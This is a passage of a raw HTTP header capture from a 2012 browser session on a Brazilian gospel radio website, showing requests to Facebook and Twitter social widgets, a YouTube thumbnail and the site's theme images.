Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /plugins/like.php?api_key=165121076905166&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Df31d030b1bac77e%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&node_type=link&width=450&font=verdana&layout=button_count&colorscheme=light&show_faces=false&send=true&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=165121076905166&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Df31d030b1bac77e%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&amp;href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&amp;node_type=link&amp;width=450&amp;font=verdana&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=true&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: SiBx7uMoERFJnZkiG3UBIuJPRxJycHuZpFJtsf12lOg=
Date: Wed, 31 Oct 2012 08:35:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /t.gif?_=1351672499804&count=horizontal&id=twitter-widget-3&lang=en&original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&size=m&text=LIBERTA-ME&url=http%3A%2F%2Ftwitter.com%2F93fmgospel&via=%4093fmgospel&type=share&twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1351672499804&amp;count=horizontal&amp;id=twitter-widget-3&amp;lang=en&amp;original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;size=m&amp;text=LIBERTA-ME&amp;url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;via=%4093fmgospel&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /t.gif?_=1351672499802&count=horizontal&id=twitter-widget-2&lang=en&original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&size=m&text=DEUS%20DA%20FAM%C3%8DLIA&url=http%3A%2F%2Ftwitter.com%2F93fmgospel&via=%4093fmgospel&type=share&twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1351672499802&amp;count=horizontal&amp;id=twitter-widget-2&amp;lang=en&amp;original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;size=m&amp;text=DEUS%20DA%20FAM%C3%8DLIA&amp;url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;via=%4093fmgospel&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /t.gif?_=1351672499806&count=horizontal&id=twitter-widget-4&lang=en&original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&size=m&text=PELO%20TELHADO&url=http%3A%2F%2Ftwitter.com%2F93fmgospel&via=%4093fmgospel&type=share&twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1351672499806&amp;count=horizontal&amp;id=twitter-widget-4&amp;lang=en&amp;original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;size=m&amp;text=PELO%20TELHADO&amp;url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;via=%4093fmgospel&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /1/urls/count.json?url=http%3A%2F%2Ftwitter.com%2F93fmgospel&callback=twttr.receiveCount HTTP/1.1

Host: cdn.api.twitter.com
GET /1/urls/count.json?url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;callback=twttr.receiveCount HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 102
Server: tfe
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=810
Expires: Wed, 31 Oct 2012 08:48:30 GMT
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /vi/JG2PtG8fies/sddefault.jpg HTTP/1.1

Host: i3.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Date: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Wed, 31 Oct 2012 14:35:00 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 27989
X-XSS-Protection: 1; mode=block
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221351672499778%22%2C%22count%22%3A%22horizontal%22%2C%22id%22%3A%22twitter-widget-0%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22PRIMEIRA%20ESSENCIA%22%2C%22url%22%3A%22http%3A%2F%2Ftwitter.com%2F93fmgospel%22%2C%22via%22%3A%22%4093fmgospel%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: fa8b093cd174ff71
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135167250041847681; Expires=Fri, 31-Oct-2014 08:35:00 GMT; Path=/; Domain=.twitter.com
Date: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /dialog/oauth?client_id=165121076905166&response_type=token%2Csigned_request%2Ccode&display=none&domain=radio93.com.br&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dfd5b4b018ccbea%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=165121076905166&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=radio93.com.br&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dfd5b4b018ccbea%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://static.ak.facebook.com/connect/xd_arbiter.php?version=11#cb=fd5b4b018ccbea&amp;origin=http%3A%2F%2Fradio93.com.br%2Ff322c9b939bd7e2&amp;domain=radio93.com.br&amp;relation=parent&amp;error=unknown_user
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-FB-Debug: 5j8soLlR2I7KUUBAsegHgsGywmVj8BvZ9Oo/D7sBcX8=
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
Content-Length: 0
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221351672499802%22%2C%22count%22%3A%22horizontal%22%2C%22id%22%3A%22twitter-widget-2%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22DEUS%20DA%20FAM%C3%8DLIA%22%2C%22url%22%3A%22http%3A%2F%2Ftwitter.com%2F93fmgospel%22%2C%22via%22%3A%22%4093fmgospel%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: 01cdafd6e45e4349
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135167250053845907; Expires=Fri, 31-Oct-2014 08:35:00 GMT; Path=/; Domain=.twitter.com
Date: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221351672499798%22%2C%22count%22%3A%22horizontal%22%2C%22id%22%3A%22twitter-widget-1%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22QUESTIONA%20OU%20ADORA%22%2C%22url%22%3A%22http%3A%2F%2Ftwitter.com%2F93fmgospel%22%2C%22via%22%3A%22%4093fmgospel%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: f67d27485e03fdb3
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135167250054670762; Expires=Fri, 31-Oct-2014 08:35:00 GMT; Path=/; Domain=.twitter.com
Date: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221351672499804%22%2C%22count%22%3A%22horizontal%22%2C%22id%22%3A%22twitter-widget-3%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22LIBERTA-ME%22%2C%22url%22%3A%22http%3A%2F%2Ftwitter.com%2F93fmgospel%22%2C%22via%22%3A%22%4093fmgospel%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: 5f7cbab998b728bf
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135167250061540387; Expires=Fri, 31-Oct-2014 08:35:00 GMT; Path=/; Domain=.twitter.com
Date: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /jot?l=%7B%22_category_%22%3A%22tfw_widgets%22%2C%22event_name%22%3A%22tweetbutton%3Aimpression%22%2C%22dnt%22%3Afalse%2C%22_%22%3A%221351672499806%22%2C%22count%22%3A%22horizontal%22%2C%22id%22%3A%22twitter-widget-4%22%2C%22lang%22%3A%22en%22%2C%22original_referer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22size%22%3A%22m%22%2C%22text%22%3A%22PELO%20TELHADO%22%2C%22url%22%3A%22http%3A%2F%2Ftwitter.com%2F93fmgospel%22%2C%22via%22%3A%22%4093fmgospel%22%2C%22type%22%3A%22share%22%2C%22logged_in%22%3Afalse%2C%22referrer%22%3A%22http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class%22%2C%22widget%22%3Atrue%2C%22pid%22%3A%22%22%7D HTTP/1.1

Host: r.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
HTTP/1.1 200 OK

Content-Type: image/gif
X-Transaction: 6704dd8973aaaad7
Last-Modified: Wed, 31 Oct 2012 08:35:00 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: guest_id=v1%3A135167250062327639; Expires=Fri, 31-Oct-2014 08:35:00 GMT; Path=/; Domain=.twitter.com
Date: Wed, 31 Oct 2012 08:35:00 GMT
Content-Encoding: gzip
Content-Length: 65
Server: tfe
GET /wp-content/themes/novo93/images/confira.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:01 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:13 GMT
Etag: &quot;e7cab9-1389-4b687f28cda40&quot;
Accept-Ranges: bytes
Content-Length: 5001
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:01 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/debate93title.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:01 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:15 GMT
Etag: &quot;e7caba-1a6f-4b687f2ab5ec0&quot;
Accept-Ranges: bytes
Content-Length: 6767
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:01 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/uploads/2012/01/debate.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:02 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 01 Feb 2012 05:34:27 GMT
Etag: &quot;108ad28-b53d-4b7e06ed73ec0&quot;
Accept-Ranges: bytes
Content-Length: 46397
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:02 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/envieSuaPergunta.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:02 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:35 GMT
Etag: &quot;e7cabe-14d6-4b687f3dc8bc0&quot;
Accept-Ranges: bytes
Content-Length: 5334
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:02 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/icon_arrow_left.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:02 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:57 GMT
Etag: &quot;e7cac5-46b-4b687f52c3d40&quot;
Accept-Ranges: bytes
Content-Length: 1131
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:02 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-camera93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:02 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 27 Jan 2012 22:10:12 GMT
Etag: &quot;e7cab2-5b5c-4b789c2b6b900&quot;
Accept-Ranges: bytes
Content-Length: 23388
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:02 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-genesis.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 27 Jan 2012 18:44:42 GMT
Etag: &quot;e80bde-602c-4b786e3c9da80&quot;
Accept-Ranges: bytes
Content-Length: 24620
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-amovoce.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 22:57:00 GMT
Etag: &quot;e7cab1-3a17-4b8f4833a2700&quot;
Accept-Ranges: bytes
Content-Length: 14871
